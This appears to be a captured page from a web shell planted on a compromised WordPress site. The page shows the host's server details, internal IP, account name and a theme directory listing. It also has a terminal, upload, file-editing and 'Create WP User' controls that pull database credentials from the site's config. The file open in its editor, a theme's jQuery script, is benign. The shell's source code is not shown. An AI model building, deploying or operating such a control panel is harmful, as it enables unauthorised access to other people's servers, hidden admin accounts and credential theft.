Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.217.47
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
ocieplenia.konin.pl
/
wp-content
/
themes
/
onetone
/
lib
/
customizer
/
assets
/
js
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
customizer-preview.js
1.82 KB
-rw-r--r--
2018-03-20 20:23
methods.js
1.59 KB
-rw-r--r--
2018-03-20 20:23
plugins.min.js
36.87 KB
-rw-r--r--
2018-03-20 20:23
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
methods.js
$ = jQuery.noConflict(); ( function( $ ) { "use strict" $(document).ready(function(){ $(".koo-chosen").chosen({ allow_single_deselect :true, width:"100%", }); }); $.ONETONEDEPENDENCY = function( el, param ) { // Access to jQuery and DOM versions of element var base = this; base.$el = $(el); base.el = el; base.init = function () { base.ruleset = $.deps.createRuleset(); // required for shortcode attrs var cfg = { show: function( el ) { el.removeClass('hidden'); }, hide: function( el ) { el.addClass('hidden'); }, log: false, checkTargets: false }; base.depRoot(); $.deps.enable( base.$el, base.ruleset, cfg ); }; base.depRoot = function() { base.$el.each( function() { $(this).find('[data-controller]').each( function() { var $this = $(this), _controller = $this.data('controller').split('|'), _condition = $this.data('condition').split('|'), _value = $this.data('value').toString().split('|'), _rules = base.ruleset; $.each(_controller, function(index, element) { var value = _value[index] || '', condition = _condition[index] || _condition[0]; _rules = _rules.createRule('[data-customize-setting-link="'+ element +'"]', condition, value); _rules.include($this); }); }); }); }; base.init(); }; $.fn.ONETONE_DEPENDENCY = function ( param ) { return this.each(function () { new $.ONETONEDEPENDENCY( this, param ); }); }; } )( jQuery );
关闭
保存